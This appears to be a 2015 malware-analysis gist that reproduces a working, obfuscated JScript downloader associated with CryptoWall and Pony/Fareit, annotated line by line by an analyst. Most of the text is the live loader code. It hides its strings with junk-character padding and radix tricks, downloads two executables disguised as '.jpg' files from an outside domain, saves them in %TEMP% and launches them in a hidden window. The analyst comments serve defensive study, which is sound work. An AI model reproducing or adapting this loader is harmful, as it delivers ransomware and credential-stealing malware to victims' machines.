
@malwareforme
Created March 26, 2015 14:16
2015-03-25 CryptoWall and Pony/Fareit JavaScript Downloader :: http://www.malwarefor.me/2015-03-25-cryptowall-3-0-and-pony-via-javascript-attachment/
// Analyst notes -- static reading of this listing only; nothing here was executed.
//
// What it is: a JScript downloader built on ActiveXObject (presumably run by
// Windows Script Host, since the gist title describes a JavaScript attachment).
// It fetches two files over HTTP, writes each into %TEMP% under a numeric
// ".exe" name, and launches each one.
//
// Obfuscation layers visible below:
//   1. Every meaningful string is padded with junk characters that a
//      character-class regex strips out again.
//   2. The method name used for that stripping is itself hidden: it is computed
//      as (number).toString(radix). Worked by hand, 59662633118 in base 36 and
//      16365588719 in base 29 both spell "replace"; the other computed names
//      have the same shape and sit in the same position as the literal
//      ["replace"] calls, so they appear to resolve to the same name.
//   3. Property names are split into fragments, with always-true comparisons
//      ((53 > 14 ? a : b)) selecting one hex-escaped character.
//   4. Many assignments (yn4, gD7, pew, ...) are never read anywhere in this
//      listing; they look like filler. Those written without `var` also create
//      implicit globals.
//
// Behaviour a defender can key on: a script host issuing an HTTP GET for a
// ".jpg" path, saving the response body as %TEMP%\<digits>.exe, then starting
// that file with a hidden window.
(function() {
var yn4 = "MOYpSB=Q2Nji=gK&Qe@d1p" [(35.0 + "QE\x8bf\x60\x83ZyiY8I$=" ["charCodeAt"](13) * 826342734)["toString"]((0 * "$L+OA\x89\x84Q\x80|x0" ["charCodeAt"](3) + 35.0))](/[Y\=jK\@M2e\&1S]/g, "");
gD7 = ("#Cv$Z\x88u'+s-GxVy\x82" ["charCodeAt"](7) * 2 + 23.0);
var pew = ("ZA|9m]c5NX',si" ["length"] * 31 + 1.0);
jfa = (9 * "Ff1#]WSlV7aK" ["length"] + 6.0);
Am5 = ("e$|R9Da=,]s3I\x8bu5O" ["charCodeAt"](8) * 5 + 30.0);
// LC2(fr, ERo, rn): download-and-run routine.
//   fr  - URL passed to the HTTP object's open() call
//   ERo - bare file name; rebound below to a full path under %TEMP%
//   rn  - when > 0 the saved file is launched after send() returns
// Returns nothing. Any exception from the request or launch is swallowed.
function LC2(fr, ERo, rn) {
// After junk removal the ProgID string reads "WScript.Shell".
var QDy = new ActiveXObject("~Wo]S7BczrziQ=pC_tA.;SPhqe`~lHyl" [(2217011921 * "nV8cvmy=[KH" ["length"] + 2.0)["toString"]((3 * "\x86XIg\x8a_4^t" ["length"] + 4.0))](/[yPQ7o\`\=qz\~HC\_AB\]\;]/g, ""));
N5D = "vsQTm;CQCNEDWAYGTxL>R>n" [("C\x87N0uc)#'oR-_" ["charCodeAt"](6) * 488878692 + 2.0)["toString"](("?a(I6^'Nl\x83E\x80\x81_" ["charCodeAt"](4) * 0 + 30.0))](/[NL\;\>WQTYEv]/g, "");
// Builds the drop path: ExpandEnvironmentStrings("%TEMP%") + "\" (char code 92)
// + the file name argument. `var ERo` re-declares the parameter, so from here
// on ERo holds the full path.
var ERo = QDy["" + (53 > 14 ? "\x45" : "\x3e") + "xp" + "andEnvironment" + (58 > 4 ? "\x53" : "\x4b") + "trings"]("Nf%D9TYE<M7aP64%" [(4.0 + "v}\x85\x88g" ["length"] * 3273117743)["toString"]((2 * "0aM\x7f?jmH/\x88\x874v(" ["length"] + 1.0))](/[\<DN6f479aY]/g, "")) + String["fr" + (65 > 27 ? "\x6f" : "\x6a") + "mChar" + "Co" + (82 > 41 ? "\x64" : "\x5f") + "e"](92) + ERo;
var au5 = (1 * "Bg:(J\x83QC=h@" ["charCodeAt"](2) + 26.0);
HvV = ("D]9RlIt*E%\x60=" ["length"] * 3 + 5.0);
// After junk removal the ProgID string reads "MSXML2.XMLHTTP".
var QN3 = new ActiveXObject("bMpS9X*lM<LI2B.J=X&MQL9HbTqTqP" [("0\x84^:w?RcDT+>" ["charCodeAt"](5) * 947025922 + 32.0)["toString"]((10.0 + "?\x8a2.Vh\x84\x83^omX0" ["length"] * 2))](/[p\<B9lJIQ\=\*q\&b]/g, ""));
var Lv_ = "yI`Q!7gUpLGQfet*V1mN>c" ["replace"](/[\*yp\`efg\!Gm\>1]/g, "");
// onreadystatechange handler: acts only when readyState === 4 (request done).
// Note there is no check of the HTTP status or of the content that came back.
QN3["o" + (64 > 24 ? "\x6e" : "\x67") + "" + "ready" + (79 > 6 ? "\x73" : "\x6e") + "tatechange"] = function() {
if (QN3["read" + (91 > 9 ? "\x79" : "\x71") + "St" + "" + (55 > 26 ? "\x61" : "\x5b") + "te"] === 4) {
// After junk removal the ProgID string reads "ADODB.Stream".
var VaG = new ActiveXObject("CACyD@OvDwBvp.ZS-twr1eWaym" [(419630479 * "@2#Ps\x899e'%bU<O" ["charCodeAt"](8) + 38.0)["toString"]((5 * "GY\x88^a" ["length"] + 4.0))](/[vyCZp1w\-\@W]/g, ""));
xna = (7.0 + "0eR6,<9OqVo\x83}[\x87" ["charCodeAt"](7) * 2);
// stream.open()
VaG["o" + "pe" + (91 > 23 ? "\x6e" : "\x64") + ""]();
Ppr = "Su70AKuw&uQUCjXGD9bGQ2" ["replace"](/[KXCwSQ0b7D\&]/g, "");
var uSU = "mh1xPwcaUk0R%A6ZyYi<orn" [(614718375 * "ovV,=QUKd\x7fR(7_T\x82k" ["charCodeAt"](10) + 59.0)["toString"]((2 * "Ky|.St\x8bhGeNH\x85" ["length"] + 9.0))](/[\<cUi16myrP\%Rk]/g, "");
HJ4 = (3.0 + "{FKH#" ["length"] * 49);
Axk = (1 * "\x60N5\x8b[)w\x88c,Z{xX" ["charCodeAt"](2) + 20.0);
// stream.type = 1 (binary mode in ADODB.Stream), so the bytes are written unmodified.
VaG["" + (89 > 23 ? "\x74" : "\x6b") + "y" + "" + (97 > 12 ? "\x70" : "\x6a") + "e"] = 1;
var kYd = (4.0 + "-i|{\x84VUZCG*;M>" ["length"] * 6);
// stream.write(<HTTP object>.ResponseBody): raw response bytes go into the stream.
VaG["w" + (95 > 29 ? "\x72" : "\x6a") + "i" + "" + (62 > 4 ? "\x74" : "\x6a") + "e"](QN3["Respo" + (61 > 44 ? "\x6e" : "\x69") + "s" + "eBod" + (88 > 44 ? "\x79" : "\x73") + ""]);
rvT = (1 * "QANaE5UG#D" ["charCodeAt"](4) + 34.0);
// stream.position = 0: rewind before saving.
VaG["pos" + (100 > 21 ? "\x69" : "\x5f") + "" + "ti" + (60 > 21 ? "\x6f" : "\x69") + "n"] = 0;
var lGe = "mPQ6ldiOX8y959AK4Eeh3)2`D" [(901703424 * "\x7f\x82>/[?6#\x83(.S" ["charCodeAt"](3) + 6.0)["toString"](("&Z}V)=x\x80;p\x7f$k" ["length"] * 2 + 8.0))](/[6QO9\`3deXE\)myK]/g, "");
// stream.saveToFile(path, 2): option 2 overwrites an existing file at the drop path.
VaG["saveToF" + (73 > 0 ? "\x69" : "\x5f") + "l" + "e"](ERo, 2);
get = ("\x88xqKHs%P46$g" ["charCodeAt"](6) * 10 + 17.0);
// stream.close()
VaG["" + (79 > 46 ? "\x63" : "\x5d") + "l" + "os" + (91 > 18 ? "\x65" : "\x60") + ""]();
jhv = "mYQNoCcVdtXI*Ezr96#<w" [(1636558871 * "t}\x8a\x83.08=ja" ["length"] + 9.0)["toString"]((29.0 + "\x7fx\x88q0\x81|HCdL@D\x83$^B+\x82k" ["charCodeAt"](11) * 0))](/[moz\#d\*\<cQ9X]/g, "");
};
var cov = "khLgMjWbmiQ&PcqyXJ0;x" [(4971886093 * "-dA;4FG@VI.\x8a" ["length"] + 2.0)["toString"](("izC3O.-M\x80ps$*N:" ["charCodeAt"](13) * 0 + 36.0))](/[g\&ibk\;yLjcJ]/g, "");
};
var vta = "8TtjGoK3KRKW/vC/zgLDX" [("\x892^DtETAJ+Fpx\x80" ["length"] * 1168970622 + 11.0)["toString"](("\x8awG\x81~r\x86" ["length"] * 4 + 1.0))](/[vGDt8\/gK]/g, "");
try {
// open("GET", fr, false): the third argument false makes the request synchronous,
// so send() below does not return until the transfer has finished.
QN3["" + "op" + (66 > 24 ? "\x65" : "\x5d") + "n"]("dGQIEKT" ["replace"](/[IKQd]/g, ""), fr, false);
var Ltz = (12 * "\x8a{uYL#_i*}\x89\x60H>S" ["length"] + 0.0);
Oax = ("P\x8bo5LfwI" ["length"] * 34 + 2.0);
// send()
QN3["" + "s" + (77 > 45 ? "\x65" : "\x5b") + "nd"]();
YC9 = (2.0 + ")\x81\x8a<XF#\x84A};7" ["length"] * 37);
if (rn > 0) {
// shell.Run(path, 0, 0): window style 0 hides the window; the final 0 means
// the script does not wait for the launched process to exit.
QDy["R" + "u" + (76 > 13 ? "\x6e" : "\x67") + ""](ERo, 0, 0);
mGl = "EUZA5QlGiToKf3bVNVtzO" ["replace"](/[VbZEfli5zo]/g, "");
Ylr = (1.0 + ",6ui.\x8bx:\x80" ["length"] * 27);
var AZV = (4.0 + "8\x825Do" ["length"] * 21);
};
TZZ = "+yq;omZ1I@B/vu6tsRPHQS`J" ["replace"](/[\+\;I\/Qut\`Zq\@sPm]/g, "");
// Empty catch: a failed download or launch produces no visible error.
} catch (er) {};
O4H = "m1QqLnz;favIF<g(W`O_D" [(3.0 + ";@d7\x86" ["length"] * 11932526623)["toString"]((0 * "\x82/SN(r\x84\x886." ["charCodeAt"](8) + 36.0))](/[az\_\;\`\<\(LImQ]/g, "");
}
// First call. Applying the regex by hand gives (defanged):
//   URL   hxxp://dorttlokolrt[.]com/images/one.jpg
//   file  8865241.exe   (so the drop path is %TEMP%\8865241.exe)
//   rn    1             (the saved file is launched)
LC2("XhftbtN@p(T:</D/6dNofur&t=8t0l~o>k~6oGlKr8t~-.%cuoZmX/2iJ*mXNa@gYeCsT/NOoMn>e!.9jLp;g" [(5966263311 * ",z_{+I}s%k" ["length"] + 8.0)["toString"]((36.0 + "(MhJ6\x8a&qP'zL" ["charCodeAt"](8) * 0))](/[2Y60K\&\*\!uD\%b89G\<\@fOZX\;LMN\(T\~\>C\-J\=]/g, ""), ")8-8T6[5f2]4(1M.3e-txke" ["replace"](/[T3\-\)M\[\(tk\]f]/g, ""), 1);
var Gl5 = (5.0 + "%\x83Xra\x8bOLn6T" ["length"] * 9);
var mb5 = "-KBmEatxUu_f9c5V12kGztp" [(727593086 * "}2\x82G.)Y\x81pR\x60'snI" ["charCodeAt"](9) + 66.0)["toString"]((36.0 + "\x81f*\x85%\x87HY\x88qu" ["charCodeAt"](4) * 0))](/[1m2\-G5\_t9UaK]/g, "");
var VyD = "h7TsOSDVCUndbH#e)o`64Fo" ["replace"](/[4C\)n\#S7V\`hFbs]/g, "");
// Second call. Applying the regex by hand gives (defanged):
//   URL   hxxp://dorttlokolrt[.]com/images/two.jpg
//   file  7246549.exe   (so the drop path is %TEMP%\7246549.exe)
//   rn    1             (the saved file is launched)
// Which payload is CryptoWall and which is Pony/Fareit cannot be told from this listing.
LC2("<~hUt65tS]p!:A_/%/Hd+Wo4rbUtStblMoGk~oqlAry_t<.Ic5>oNmf/DiK_m1aMg5eYs8/Uqt<w9No9.Qj5p7Tg" ["replace"](/[\_\<IbMq7fK\]NU896DyGQ\+S\!\~AY1H5\>T\%4W]/g, ""), "L7%284u6B~5q4G9s.Ee*xDe" ["replace"](/[Lq\%s8\*\~EBGuD]/g, ""), 1);
var rFy = "e~v-vyW+X*nicEI]b=h*9" [(35.0 + "\x7fx1N-E2\x83\x80Q\x60b^\x894&sv" ["charCodeAt"](5) * 513738328)["toString"]((3 * "k\x832x}\x82W[\x81M." ["length"] + 0.0))](/[i\*\+\]\-Eye\=\~]/g, "");
mBN = (5 * "1\x83\x81d\x7f/APE{r" ["charCodeAt"](6) + 1.0)
})(); //XvXBUIuVck